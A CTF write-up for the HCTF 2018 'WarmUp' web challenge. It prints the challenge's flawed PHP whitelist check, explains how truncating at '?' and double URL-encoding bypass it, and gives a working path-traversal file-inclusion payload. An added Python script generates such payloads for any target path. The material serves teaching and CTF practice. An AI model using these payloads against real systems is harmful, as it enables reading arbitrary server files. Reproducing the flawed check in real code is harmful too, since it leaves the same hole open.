[BUUOJ Record] [HCTF 2018] WarmUp

The first Web challenge on BUUOJ is actually a high-quality problem, yet most people do not understand why it became the most-solved one, and the instructors joke that it is a "discouraging" opener. The challenge appears to be modelled on the phpMyAdmin file inclusion vulnerability (CVE-2018-12613).

This article aims to analyze the knowledge points and ideas involved in this challenge; readers who just want a master's WriteUp with the flag can look at other articles.

Problem-solving process

Problem-solving ideas

Viewing the page source, we find a hint:

Following it to source.php, we get the source code:

    <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
    ?>

The code divides into two parts. The first part defines a class emmm whose checkFile function checks whether the incoming file parameter is acceptable:

    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

The second part is the global code, from which we can read off the three conditions for the file include:

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])   // the file parameter is read from $_REQUEST; if it is non-empty, is a string, and passes checkFile() of class emmm, the file is included
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }

In the checkFile function of class emmm, we can see that the whitelist contains two files:

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];

What does hint.php contain? Try /source.php?file=hint.php:

 

The hint tells us the flag is in ffffllllaaaagggg, so the key to the challenge is how to include this file that is outside the whitelist.

From the second part of the code we can see that the crux is how to get ffffllllaaaagggg past the checkFile check, so we need to start from the checkFile function of class emmm.

Prerequisite knowledge

Before reading the code of checkFile, we need to understand a few functions that appear in it:

1.  in_array() searches an array for the specified value (it compares against the array's values, not its keys, so here the value must match "source.php" or "hint.php")

 

 More information: https://www.w3school.com.cn/php/func_array_in_array.asp

 

2.  mb_substr() returns part of a string. The substr() function we learned earlier works on bytes and can cut a multibyte (for example Chinese) character in half; to split strings containing Chinese characters you need mb_substr()

 

 More information: https://www.runoob.com/php/func-string-mb_substr.html

 

3.  mb_strpos() finds the position of the first occurrence of a string inside another string

More information: https://www.php.net/manual/zh/function.mb-strpos.php

Analysis of the core code

With the small points above in hand, let's go back and look at the core code:

    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {  // $page must be set and must be a string
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {  // is $page itself in the whitelist?
                return true;
            }

            $_page = mb_substr(   // if $page contains '?', take the part before the first '?' and store it in $_page
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {  // is the truncated $_page in the whitelist?
                return true;
            }

            $_page = urldecode($page);   // $_page is reassigned to the URL-decoded $page
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')   // again cut the (decoded) $_page at the first '?'
            );
            if (in_array($_page, $whitelist)) {  // is the truncated $_page in the whitelist?
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

The logic may look a bit messy, so let's comb through it; the following draws on the analysis by the master Wang sigh:

We can see that the function body contains four if statements:

The first if statement checks the variable: $page must be a string, otherwise it returns false  // this branch only ever returns false, so it is of no use to us
The second if statement checks whether $page itself is in the $whitelist array; if so, it returns true
The third if statement cuts $page at the first '?' and checks whether the part before the '?' is in the $whitelist array; if so, it returns true
The fourth if statement URL-decodes $page, cuts it at the first '?' again, and checks whether the result is in $whitelist; if so, it returns true
If none of the four if statements returned, false is returned

Three of the if statements can return true. The second checks $page itself against the whitelist, so it cannot be used to include anything else.

The third cuts off everything from the first '?' onward. One might expect the part after the '?' to be swallowed as query-string parameters, but only the first '?' in a URL separates the path from the query string; a second '?' inside the value of file reaches PHP intact, so this branch is in fact usable (the payload at the end of this article goes through it).

The fourth if statement URL-decodes the value before cutting it. PHP already URL-decodes parameters once when it fills $_REQUEST, so we can URL-encode the '?' twice (%253f): the server's decode leaves %3f, which the third if does not see as a '?', and checkFile's own urldecode() turns it into a real '?', so the fourth if still passes.

As long as one of these if statements returns true, the file is included; the key point is that what gets included is the full, untruncated $_REQUEST['file'], not the truncated $_page that was compared with the whitelist.

So our breakthrough is the fourth if statement (the third works the same way, minus the extra decode); as long as its condition is met, we can include files:

$_page = urldecode($page); 
$_page = mb_substr(
  $_page,
  0,
  mb_strpos($_page . '?', '?') 
);
if (in_array($_page, $whitelist)) {
  return true;
}

Here the value of $page is URL-decoded. Note that PHP already URL-decodes parameter values once when it populates the $_GET, $_POST and $_REQUEST superglobals.

So between the server and this code the value is decoded twice in total, which is why the value we send is URL-encoded twice.

The second point of this breakthrough is that the code only takes the part before the '?' and compares it with the whitelist, so we just have to make sure that what precedes the '?' is source.php or hint.php for it to return true.

For example, /source.php?file=source.php%253f123456 passes the check: $_REQUEST['file'] holds source.php%3f123456 (PHP's one decode), checkFile's urldecode() turns that into source.php?123456, which is cut down to source.php and is in the whitelist. include() is then called with the once-decoded value source.php%3f123456, not with the truncated name (%253f is '?' URL-encoded twice).

It is possible to construct Payload:

/index.php?file=source.php?/../../../../ffffllllaaaagggg

Note that ffffllllaaaagggg can be included here because PHP's include() treats source.php?/ as a directory component in the path, and each ../ then moves up one directory, so the non-existent component is simply discarded.

ffffllllaaaagggg sits in the filesystem root, and a web service's files are usually in /var/www/html; together with the fake directory source.php?/ that is four levels, so we need four ../ to get back to the root.

(If you do not know where the flag is during a competition, add one ../ at a time and try.)
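To check the reasoning of the two sections above (which of the four if branches a value passes, and what path include() finally receives once the ../ traversal is resolved) without a PHP box, here is an added Python model. It is not code from the challenge or from the original write-up: it re-implements checkFile() in Python, models PHP's single URL-decode of the query string with urllib.parse.unquote, and uses posixpath.normpath as a stand-in for the lexical '..' resolution the text attributes to include(). The web root /var/www/html and the flag path are assumptions taken from the text; the candidate values in the main block are constructed.

```python
"""Trace the WarmUp checkFile() gate offline.

Added example, not code from the challenge or the original write-up. It
re-implements checkFile() in Python, models PHP's single URL-decode of the
query string, and uses posixpath.normpath as a stand-in for the lexical '..'
resolution the write-up attributes to include(). The web root /var/www/html
is an assumption, as in the text.
"""
import posixpath
from urllib.parse import unquote

WHITELIST = {"source": "source.php", "hint": "hint.php"}


def check_file(page):
    """Return the if-branch (2, 3 or 4) that accepts `page`, or 0 if rejected."""
    if not isinstance(page, str):
        return 0
    allowed = WHITELIST.values()            # in_array() compares values, not keys
    if page in allowed:                     # second if: exact match
        return 2
    # mb_strpos($page . '?', '?'): the appended '?' guarantees a hit, so when
    # the value has no '?' the cut lands at len(page) and the whole string is
    # compared (which is why plain traversal like 'hint.php/../x' fails).
    if page[: (page + "?").index("?")] in allowed:      # third if
        return 3
    decoded = unquote(page)                 # fourth if: one extra urldecode()
    if decoded[: (decoded + "?").index("?")] in allowed:
        return 4
    return 0


def request_value(query_value):
    """$_REQUEST['file']: PHP URL-decodes the raw query-string value exactly once."""
    return unquote(query_value)


def included_path(query_value, webroot="/var/www/html"):
    """Path that include() receives for a ?file= value, or None when rejected.

    include() is given the once-decoded value, not the twice-decoded string
    the fourth branch compared, and the fake 'source.php?/' (or
    'source.php%3f/') segment is simply discarded by the following '..'.
    """
    page = request_value(query_value)
    if not page or check_file(page) == 0:
        return None
    return posixpath.normpath(posixpath.join(webroot, page))


def payload(target, webroot="/var/www/html", double_encode=False):
    """Build a ?file= value that makes include() open `target` (absolute path).

    Traversal depth is the number of directories in webroot plus one for the
    fake 'source.php?/' directory. double_encode=True emits %253f so the '?'
    only appears after checkFile()'s own urldecode() (the fourth branch).
    """
    depth = len([p for p in webroot.split("/") if p]) + 1
    sep = "%253f" if double_encode else "?"
    return "source.php" + sep + "/" + "../" * depth + target.lstrip("/")


if __name__ == "__main__":
    # constructed candidate values, traced the way the server would see them
    for value in [
        "hint.php",
        "hint.php/../ffffllllaaaagggg",
        "source.php?/../../../../ffffllllaaaagggg",
        payload("/ffffllllaaaagggg", double_encode=True),
        "ffffllllaaaagggg",
    ]:
        seen = request_value(value)
        print(f"{value!r}: branch {check_file(seen)}, include -> {included_path(value)}")
```

Running it shows the two points the text makes: a value with no '?' is compared whole and rejected, the single-'?' payload passes through the third branch while the %253f variant passes through the fourth, and in both cases the path handed to include() collapses to /ffffllllaaaagggg after four ../ from the assumed web root.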

 


Origin www.cnblogs.com/yesec/p/12635274.html